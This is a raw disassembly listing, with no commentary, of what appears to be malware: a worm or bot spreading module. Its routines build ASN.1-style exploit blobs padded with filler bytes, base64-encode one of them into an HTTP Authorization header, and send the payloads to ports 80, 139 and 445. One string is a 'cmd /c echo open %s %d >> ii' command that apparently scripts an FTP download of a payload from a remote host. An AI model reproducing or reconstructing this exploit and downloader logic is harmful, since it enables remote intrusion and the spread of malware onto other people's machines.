cmp eax, 0FFFFh
jge short loc_402AC8
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_415D2F
mov edi, eax
pop ecx
test edi, edi
jnz short loc_402ACC
loc_402AC8: ; CODE XREF: sub_402A9B+D�j
xor al, al
jmp short loc_402B23
; ---------------------------------------------------------------------------
loc_402ACC: ; CODE XREF: sub_402A9B+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_415500
add esp, 0Ch
cmp ebx, 1
jnz short loc_402AF1
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_402B0B
; ---------------------------------------------------------------------------
loc_402AF1: ; CODE XREF: sub_402A9B+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_402B0B: ; CODE XREF: sub_402A9B+54�j
push eax
call sub_415560
add esp, 0Ch
push dword ptr [esi]
call sub_415DE1
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_402B23: ; CODE XREF: sub_402A9B+2F�j
pop edi
pop esi
pop ebx
retn
sub_402A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B27 proc near ; CODE XREF: sub_402C5D+89�p
; sub_402C5D+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_4325D4
call sub_402A2D
lea ecx, [ebp+var_8]
call sub_402A9B
mov eax, [ebp+var_4]
inc eax
push eax
call sub_415D2F
mov edi, eax
pop ecx
test edi, edi
jnz short loc_402B61
xor al, al
jmp short loc_402B9D
; ---------------------------------------------------------------------------
loc_402B61: ; CODE XREF: sub_402B27+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_415500
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_415560
add esp, 18h
mov ecx, esi
call sub_402A82
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_402A82
mov al, 1
loc_402B9D: ; CODE XREF: sub_402B27+38�j
pop edi
pop esi
leave
retn
sub_402B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA1 proc near ; CODE XREF: sub_402BD5+14�p
; sub_402BF2+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_402A2D
mov ecx, esi
call sub_402A82
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_402BA1 endp
; =============== S U B R O U T I N E =======================================
sub_402BD5 proc near ; CODE XREF: sub_402C5D+F0�p
; sub_402C5D+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_415C80
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_402BA1
pop esi
retn 4
sub_402BD5 endp
; =============== S U B R O U T I N E =======================================
sub_402BF2 proc near ; CODE XREF: sub_402C3E+B�p
; sub_402C5D+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_402BA1
retn 8
sub_402BF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C02 proc near ; CODE XREF: sub_402C3E+16�p
; sub_402C5D+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_402A9B
test al, al
jz short loc_402C3B
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push (offset loc_4259A3+1)
call sub_402A2D
mov ecx, esi
call sub_402A82
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_402C3B: ; CODE XREF: sub_402C02+F�j
pop esi
leave
retn
sub_402C02 endp
; =============== S U B R O U T I N E =======================================
sub_402C3E proc near ; CODE XREF: sub_402C5D+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_402BF2
test al, al
jz short loc_402C59
mov ecx, esi
call sub_402C02
loc_402C59: ; CODE XREF: sub_402C3E+12�j
pop esi
retn 8
sub_402C3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C5D proc near ; CODE XREF: sub_40345C+86�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_4029E9
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_402FB1
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_402FB1
push esi
lea ecx, [ebp+var_30]
call sub_4029E9
lea ecx, [ebp+var_20]
call sub_4029E9
lea ecx, [ebp+var_50]
call sub_4029E9
lea ecx, [ebp+var_18]
call sub_4029E9
lea ecx, [ebp+var_40]
call sub_4029E9
lea ecx, [ebp+var_38]
call sub_4029E9
lea ecx, [ebp+var_28]
call sub_4029E9
push 4
push offset dword_425644
lea ecx, [ebp+var_30]
call sub_402BA1
push 3
push offset dword_42564C
lea ecx, [ebp+var_30]
call sub_402BA1
lea ecx, [ebp+var_30]
call sub_402B27
lea ecx, [ebp+var_30]
call sub_402C02
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_415500
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_402BA1
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_402BA1
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_402BA1
lea ecx, [ebp+var_20]
call sub_402B27
push offset loc_4259CC
lea ecx, [ebp+var_50]
call sub_402BD5
lea ecx, [ebp+var_50]
call sub_402B27
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_4029F3
lea ecx, [ebp+var_58]
call sub_402B27
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_402C3E
lea ecx, [ebp+var_58]
call sub_402A82
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_415500
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_402BD5
push 4
push offset dword_425650
lea ecx, [ebp+var_18]
call sub_402BA1
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_402BA1
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_402BA1
lea ecx, [ebp+var_18]
call sub_402B27
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_402BF2
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_402BF2
lea ecx, [ebp+var_40]
call sub_402C02
lea ecx, [ebp+var_18]
call sub_402A82
lea ecx, [ebp+var_50]
call sub_402A82
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_402BF2
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_402BF2
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_402BF2
lea ecx, [ebp+var_38]
call sub_402C02
lea ecx, [ebp+var_20]
call sub_402A82
lea ecx, [ebp+var_30]
call sub_402A82
lea ecx, [ebp+var_40]
call sub_402A82
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_402BA1
lea ecx, [ebp+var_28]
call sub_402B27
push 2
push offset dword_4259C0
lea ecx, [ebp+var_28]
call sub_402BA1
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_402BF2
lea ecx, [ebp+var_28]
call sub_402C02
lea ecx, [ebp+var_38]
call sub_402A82
lea ecx, [ebp+var_10]
call sub_4029E9
lea ecx, [ebp+var_8]
call sub_4029E9
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_402BF2
lea ecx, [ebp+var_10]
call sub_402A9B
lea ecx, [ebp+var_28]
call sub_402A82
push offset dword_4259BC
lea ecx, [ebp+var_8]
call sub_402BD5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402BF2
lea ecx, [ebp+var_8]
call sub_402A9B
lea ecx, [ebp+var_10]
call sub_402A82
push offset dword_4259B8
lea ecx, [ebp+var_10]
call sub_402BD5
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_402BF2
lea ecx, [ebp+var_10]
call sub_402A9B
lea ecx, [ebp+var_8]
call sub_402A82
push offset dword_4259AC
lea ecx, [ebp+var_8]
call sub_402BD5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402BF2
lea ecx, [ebp+var_8]
call sub_402A9B
lea ecx, [ebp+var_10]
call sub_402A82
push offset dword_4259A8
lea ecx, [ebp+var_48]
call sub_402BD5
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_402BF2
lea ecx, [ebp+var_8]
call sub_402A82
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_402FBF
; ---------------------------------------------------------------------------
loc_402FB1: ; CODE XREF: sub_402C5D+1B�j
; sub_402C5D+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_402FBF: ; CODE XREF: sub_402C5D+352�j
pop edi
pop ebx
leave
retn
sub_402C5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FC3 proc near ; CODE XREF: sub_403087+A1�p
; sub_403087+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_4221F8 ; select
cmp eax, edi
jnz short loc_40302A
lea eax, [ebp+var_10C]
push eax
push esi
call sub_420B60 ; __WSAFDIsSet
test eax, eax
jnz short loc_40302E
loc_40302A: ; CODE XREF: sub_402FC3+54�j
xor eax, eax
jmp short loc_40303E
; ---------------------------------------------------------------------------
loc_40302E: ; CODE XREF: sub_402FC3+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_436480 ; recv
loc_40303E: ; CODE XREF: sub_402FC3+69�j
pop edi
pop esi
leave
retn
sub_402FC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403042 proc near ; CODE XREF: sub_403087+81�p
; sub_403087+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_436464 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp eax, 4
jz short loc_40306C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40306C: ; CODE XREF: sub_403042+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4364B8 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403087 proc near ; CODE XREF: sub_403161+48�p
; sub_40345C+177�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_415D2F
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4030B0
xor al, al
jmp loc_40315C
; ---------------------------------------------------------------------------
loc_4030B0: ; CODE XREF: sub_403087+20�j
push ebx
push 0
push esi
call sub_415500
push 2Fh
push offset dword_4256E0
push esi
call sub_415560
push 8
lea eax, [esi+31h]
push offset dword_425710
push eax
mov [esi+2Fh], di
call sub_415560
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_415560
push 6
add ebx, edi
push offset dword_4325CC
push ebx
call sub_415560
mov ebx, [ebp+arg_0]
push 85h
push offset dword_425658
push ebx
call sub_403042
add esp, 48h
test al, al
jnz short loc_403118
loc_403114: ; CODE XREF: sub_403087+B5�j
xor bl, bl
jmp short loc_403153
; ---------------------------------------------------------------------------
loc_403118: ; CODE XREF: sub_403087+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_402FC3
push [ebp+var_4]
push esi
push ebx
call sub_403042
add esp, 1Ch
test al, al
jz short loc_403114
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_402FC3
add esp, 10h
mov bl, 1
loc_403153: ; CODE XREF: sub_403087+8F�j
push esi
call sub_415DE1
pop ecx
mov al, bl
loc_40315C: ; CODE XREF: sub_403087+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_403087 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403161 proc near ; CODE XREF: sub_40345C+15D�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_42571C
push [ebp+arg_0]
call ds:dword_4221F4 ; send
cmp eax, 48h
jnz short loc_40319C
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_402FC3
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40319C
cmp [ebp+var_20], 82h
jz short loc_4031A0
loc_40319C: ; CODE XREF: sub_403161+1B�j
; sub_403161+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4031A0: ; CODE XREF: sub_403161+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403087
add esp, 0Ch
leave
retn
sub_403161 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4031B3 proc near ; CODE XREF: sub_4031FF+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_422260
call sub_415F6C
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_422258
fstp [esp+10h+var_10]
call sub_415E4A
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_415F6C
inc eax
leave
retn
sub_4031B3 endp
; =============== S U B R O U T I N E =======================================
sub_4031FF proc near ; CODE XREF: sub_4033A1+24�p
var_40 = qword ptr -40h
mov eax, offset loc_421203
call sub_416438
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_403834
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_4031B3
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_403241
push edi
push eax
lea ecx, [ebp-38h]
call sub_4037AF
loc_403241: ; CODE XREF: sub_4031FF+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40335E
mov ebx, [ebp+10h]
loc_403250: ; CODE XREF: sub_4031FF+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40325A
push 3
jmp short loc_40326C
; ---------------------------------------------------------------------------
loc_40325A: ; CODE XREF: sub_4031FF+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_403264
push 2
jmp short loc_40326C
; ---------------------------------------------------------------------------
loc_403264: ; CODE XREF: sub_4031FF+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40326D
push 1
loc_40326C: ; CODE XREF: sub_4031FF+59�j
; sub_4031FF+63�j
pop ebx
loc_40326D: ; CODE XREF: sub_4031FF+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_422270
fstp [esp+40h+var_40]
call sub_415F93
pop ecx
pop ecx
call sub_415F6C
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_4032AC
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_4032AC: ; CODE XREF: sub_4031FF+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40331A
add [ebp-18h], eax
loc_4032FE: ; CODE XREF: sub_4031FF+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, ds:byte_425768[eax]
push eax
push 1
call sub_403631
inc esi
cmp esi, [ebp-1Ch]
jb short loc_4032FE
loc_40331A: ; CODE XREF: sub_4031FF+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_403338
push dword ptr [ebp+14h]
call sub_415C80
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_40368A
mov [ebp-18h], edi
loc_403338: ; CODE XREF: sub_4031FF+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_403352
sub esi, [ebp-1Ch]
loc_403343: ; CODE XREF: sub_4031FF+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_403631
dec esi
jnz short loc_403343
loc_403352: ; CODE XREF: sub_4031FF+13F�j
cmp [ebp+10h], edi
ja loc_403250
push 1
pop ebx
loc_40335E: ; CODE XREF: sub_4031FF+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_403834
push ds:dword_422268
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_4036E1
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_403834
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_4031FF endp
; =============== S U B R O U T I N E =======================================
sub_4033A1 proc near ; CODE XREF: sub_40345C+140�p
mov eax, offset loc_421220
call sub_416438
sub esp, 10h
push ebx
push esi
push edi
push offset byte_4325D8
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_4031FF
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_415D2F
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_4033EB
xor bl, bl
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_4033EB: ; CODE XREF: sub_4033A1+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_422278
cmp ecx, ebx
jnz short loc_4033F9
mov ecx, eax
loc_4033F9: ; CODE XREF: sub_4033A1+54�j
cmp [ebp+18h], ebx
jz short loc_403401
mov eax, [ebp+18h]
loc_403401: ; CODE XREF: sub_4033A1+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_4159FA
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_4364B8 ; send
cmp eax, esi
jz short loc_403426
xor bl, bl
jmp short loc_403428
; ---------------------------------------------------------------------------
loc_403426: ; CODE XREF: sub_4033A1+7F�j
mov bl, 1
loc_403428: ; CODE XREF: sub_4033A1+83�j
push edi
call sub_415DE1
pop ecx
loc_40342F: ; CODE XREF: sub_4033A1+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_403834
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_403834
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_4033A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40345C proc near ; CODE XREF: sub_405DAD+1EA�p
; DATA XREF: _2:off_426624�o
var_420 = byte ptr -420h
var_41F = byte ptr -41Fh
var_391 = byte ptr -391h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_BB = byte ptr 0C3h
push ebp
mov ebp, esp
sub esp, 420h
and [ebp+var_420], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_41F]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp+var_420]
push offset sub_425914
push eax
call sub_415560
add esp, 0Ch
mov eax, offset byte_42AD8C
push eax
push eax
push ds:dword_4325E0
push [ebp+arg_0]
call sub_409526
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_391]
push 400h
push eax
call sub_4159FA
add eax, 90h
push eax
lea eax, [ebp+var_420]
push eax
push 164h
lea eax, [ebp+var_8]
push offset sub_4257AC
push eax
call sub_402C5D
xor esi, esi
add esp, 30h
cmp [ebp+var_4], esi
jnz short loc_4034F8
xor eax, eax
jmp loc_403624
; ---------------------------------------------------------------------------
loc_4034F8: ; CODE XREF: sub_40345C+93�j
mov [ebp+var_C], esi
loc_4034FB: ; CODE XREF: sub_40345C+19F�j
test esi, esi
jnz loc_403601
push 6
push 1
push 2
call ds:dword_422200 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4035E9
xor eax, eax
lea edi, [ebp+var_1A]
stosd
push [ebp+arg_A0]
stosd
stosd
stosw
mov [ebp+var_1C], 2
call ds:dword_436468 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4364A8 ; inet_addr
mov [ebp+var_18], eax
lea eax, [ebp+var_1C]
push 10h
push eax
push ebx
call ds:dword_436410 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4035DE
cmp [ebp+arg_A0], 50h
jnz short loc_4035A6
mov al, [ebp+arg_BB]
sub esp, 10h
mov esi, esp
mov [ebp+var_20], esp
push 0
mov ecx, esi
mov [esi], al
call sub_403834
lea eax, [ebp+arg_4]
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, esi
call sub_403870
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_4033A1
add esp, 1Ch
jmp short loc_4035DB
; ---------------------------------------------------------------------------
loc_4035A6: ; CODE XREF: sub_40345C+108�j
cmp [ebp+arg_A0], 8Bh
jnz short loc_4035C0
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_403161
jmp short loc_4035D8
; ---------------------------------------------------------------------------
loc_4035C0: ; CODE XREF: sub_40345C+154�j
cmp [ebp+arg_A0], 1BDh
jnz short loc_4035DE
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_403087
loc_4035D8: ; CODE XREF: sub_40345C+162�j
add esp, 0Ch
loc_4035DB: ; CODE XREF: sub_40345C+148�j
movzx esi, al
loc_4035DE: ; CODE XREF: sub_40345C+FB�j
; sub_40345C+16E�j
push ebx
call ds:dword_436500 ; closesocket
test esi, esi
jnz short loc_4035F4
loc_4035E9: ; CODE XREF: sub_40345C+B8�j
push 3E8h
call ds:dword_422054 ; Sleep
loc_4035F4: ; CODE XREF: sub_40345C+18B�j
inc [ebp+var_C]
cmp [ebp+var_C], 2
jl loc_4034FB
loc_403601: ; CODE XREF: sub_40345C+A1�j
lea ecx, [ebp+var_8]
call sub_402A82
test esi, esi
jz short loc_403622
mov eax, [ebp+arg_A8]
imul eax, 3Ch
inc ds:dword_426628[eax]
lea eax, dword_426628[eax]
loc_403622: ; CODE XREF: sub_40345C+1AF�j
mov eax, esi
loc_403624: ; CODE XREF: sub_40345C+97�j
pop edi
pop esi
pop ebx
leave
retn
sub_40345C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4211E4
loc_403629: ; CODE XREF: sub_4211E4+3�j
; _0:004211FD�j ...
push 1
call sub_403834
retn
; END OF FUNCTION CHUNK FOR sub_4211E4
; =============== S U B R O U T I N E =======================================
sub_403631 proc near ; CODE XREF: sub_4031FF+110�p
; sub_4031FF+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_422268
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40364B
call sub_420AAA
loc_40364B: ; CODE XREF: sub_403631+13�j
test ebx, ebx
jbe short loc_403682
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4037AF
test al, al
jz short loc_403682
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_415500
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_403682: ; CODE XREF: sub_403631+1C�j
; sub_403631+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_403631 endp
; =============== S U B R O U T I N E =======================================
sub_40368A proc near ; CODE XREF: sub_4031FF+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_422268
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_4036A4
call sub_420AAA
loc_4036A4: ; CODE XREF: sub_40368A+13�j
test ebx, ebx
jbe short loc_4036D9
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4037AF
test al, al
jz short loc_4036D9
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_415560
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_4036D9: ; CODE XREF: sub_40368A+1C�j
; sub_40368A+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40368A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036E1 proc near ; CODE XREF: sub_4031FF+17C�p
; sub_4209C0+15�p
